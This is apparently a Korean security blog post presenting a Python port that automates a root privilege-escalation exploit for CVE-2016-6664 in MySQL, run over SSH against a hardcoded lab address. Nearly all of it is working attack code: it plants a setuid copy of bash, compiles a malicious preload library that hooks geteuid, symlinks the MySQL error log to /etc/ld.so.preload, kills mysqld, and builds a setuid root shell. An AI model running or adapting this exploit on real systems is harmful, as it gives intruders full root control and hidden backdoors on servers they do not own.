본문 바로가기
CVE/CVE-2016-6664

Cve-2016-6664 ][ python으로 포팅 및 자동 exploit

by SpeeDr00t 2016. 11. 14.
반응형

 Cve-2016-6664 ][ python으로 포팅 및 자동 exploit

1.소스

  

'''
    write by SpeeDr00t

'''



from jkc_header import *
from cshell import *
from CSshConnector import *


class Cve20166664 :

    def __init__(self, _host, _id , _passwd ) :
        self.shell = ''
        self.ssh = ''
        self.log_path = ''


        self.backdoor_src = '/bin/bash'
        self.backdoor = '/tmp/mysqlrootsh'
        self.preload_file = '/etc/ld.so.preload'
        self.exploit_src = '/tmp/exploit.c'
        self.exploit = '/tmp/exploit.so'
        self.root_shell_src ='/tmp/speedroot.c'
        self.root_shell ='/tmp/speedroot'


        self.connect( _host ,  _id , _passwd )


    def get_log_path(self) :
        return self.log_path


    def do_print(self , _name = '' , _data = '\n' ) :
        print " -- > %s : %s " %  ( _name ,  _data )


    def connect(self, _host , _id , _passwd ) :

        self.shell = CSshConnector(_host ,_id,_passwd)
        self.ssh = self.shell.get_ssh()


    def log_file_path(self) :
    
        self.log_path =  self.shell.send_cmd('ps aux | grep mysql | awk -F\'log-error=\' \'{ print $2 }\' | cut -d\' \' -f1 | grep \'/\'')
        self.do_print("log_path",self.log_path)       

 
    def check_id(self) :
        chk_id = self.shell.send_cmd('id | grep mysql')
        self.do_print('check id',chk_id)

    def do_check_file(self, _file) :

        result = self.shell.send_cmd('ls -ltr ' + _file )
        
        self.do_print('check file ', result )
      
        if( result == '' ) : 
            return 0
        else :
            return 1
        

      

    def do_create_backdoor(self) :

        cmd = "cp %s %s " % ( self.backdoor_src , self.backdoor )
        self.shell.send_cmd(cmd)
        self.do_print('create backdoor ',cmd)
        
 
    def do_upload_exploit(self) :

        self.ssh.upload_data("""

            #define _GNU_SOURCE
            #include <stdio.h>
            #include <sys/stat.h>
            #include <unistd.h>
            #include <dlfcn.h>
            #include <sys/types.h>
            #include <sys/stat.h>
            #include <fcntl.h>

            uid_t geteuid(void) {

	        static uid_t  (*old_geteuid)();
	
	        old_geteuid = dlsym(RTLD_NEXT, "geteuid");
	        if ( old_geteuid() == 0 ) {

		    chown("/tmp/mysqlrootsh", 0, 0);
		    chmod("/tmp/mysqlrootsh", 04777);
		    //unlink("/etc/ld.so.preload");
	        }
	        return old_geteuid();
            }
        """,self.exploit_src)

        self.do_print('do upload exloit' ,'ok')
  
        self.ssh.gcc(['-Wall','-fPIC','-shared','-o',self.exploit,self.exploit_src,'-ldl'])
        self.do_print('compile' ,'ok')

        self.do_check_file(self.exploit )

    def do_upload_root_shell(self) :


        self.ssh.upload_data("""


            #include <stdio.h>

            int main( int argc , char ** argv )
            {
                setuid(0);
                setgid(0);
                system("/bin/bash");
            return 0;
            }

        """,self.root_shell_src)


        self.do_print('do upload root shell' ,'ok')
        self.ssh.gcc(['-o',self.root_shell,self.root_shell_src])

        self.do_print('compile' ,'ok')
        self.do_check_file(self.root_shell_src )

    def do_delete(self, _file ) :

        self.shell.send_cmd('rm ' + self.log_path )
        self.do_print('rm ' ,self.log_path)
        self.do_check_file(self.log_path)

    def do_check_link_file(self):

        self.do_check_file( self.preload_file )
        self.do_check_file( self.log_path )

    def do_link(self) :
        
        cmd = "ln -s %s %s" % ( self.preload_file , self.log_path )
        self.shell.send_cmd(cmd)
        self.do_print('link' , cmd )
        self.do_check_link_file()
        

    def do_symlink(self) :

        self.do_check_link_file()

        # rm /usr/local/mysql/data/debian.err
        self.do_delete(self.log_path)
        self.do_link()

    def do_killall_mysqld(self) :

        self.do_print('killall mysqld' )
        self.shell.send_cmd('killall mysqld')


    def do_echo(self) :
    
        #print self.ssh.echo([self.exploit,">",self.preload_file])
        self.shell.send_cmd("echo " + self.exploit + " > " + self.preload_file)


    def do_cat(self, _file ) :

        cmd =  "cat  %s " % ( _file )
        self.shell.send_cmd(cmd)
        self.do_print(cmd )

    def do_check_backdoor(self) :

        self.do_check_file( self.preload_file )
        self.do_check_file( self.preload_file + " | grep rws | grep -q root " )

    def do_chmod(self, _file ) :
   
        cmd =  "chmod 755  %s" % ( _file )
        self.shell.send_cmd(cmd)
        self.do_print(cmd )
 

    def do_sudo(self) :
  
        self.shell.send_cmd("sudo 2>/dev/null >/dev/null")


    def do_clear(self) :
     
        cmd =  "%s -p -c rm -f %s;rm -f %s" % (self.backdoor , self.preload_file, self.exploit )
        self.shell.send_cmd(cmd)
        self.do_print(cmd )


    def do_run(self) :

        cmd =  "%s  -p -c \"rm -f /etc/ld.so.preload; rm -f %s\"" % ( self.backdoor, self.exploit )
        print self.shell.send_cmd(cmd)
        self.do_print(cmd)


        cmd = " command > %s -p -c %s " % (self.backdoor, self.root_shell)
        #self.ssh['/tmp/mysqlrootsh -p -c /tmp/speedroot']
        self.do_print(cmd)


    def do_check_file_loop(self, _path) :

        while(True) : 

            sleep(0.1)

            if( self.do_check_file(_path +  " | grep root "  ) ) :
                print "do check file loop "

                # echo /tmp/exploit.so > /etc/ld.so.prelod
                self.do_echo()
                self.do_check_file( self.preload_file )

                # rm /usr/local/mysql/data/debian.err
                self.do_delete(self.log_path)

                break;
 

    def do_exploit(self) :

        # get log file apth 
        self.log_file_path()

        # check id ( mysql )
        self.check_id()

        # create backdoor
        self.do_create_backdoor()

        # upload exploit
        self.do_upload_exploit()        

        # upload root shell(root.sh)
        self.do_upload_root_shell()

        # symlink the log file to /etc
        self.do_symlink()

        # kill all mysqld
        self.do_killall_mysqld()

        # wait for /etc/ld.so.preload 
        self.do_check_file_loop( self.preload_file )


        # echo /tmp/exploit.so > /etc/ld.so.prelod
        self.do_echo()
        self.do_check_file( self.preload_file )

        # chmod 755 /etc/ld.so.preload
        self.do_chmod(self.preload_file)

        # inject the exloit.so shared library to escalate privileges
        self.do_sudo()
        self.do_check_backdoor()


        self.do_check_file( self.preload_file )
        self.do_cat( self.preload_file)      
        self.do_run()
        self.ssh.interactive() 



poc = Cve20166664( '192.168.163.135', 'mysql','hacker')
poc.do_exploit()



결과


반응형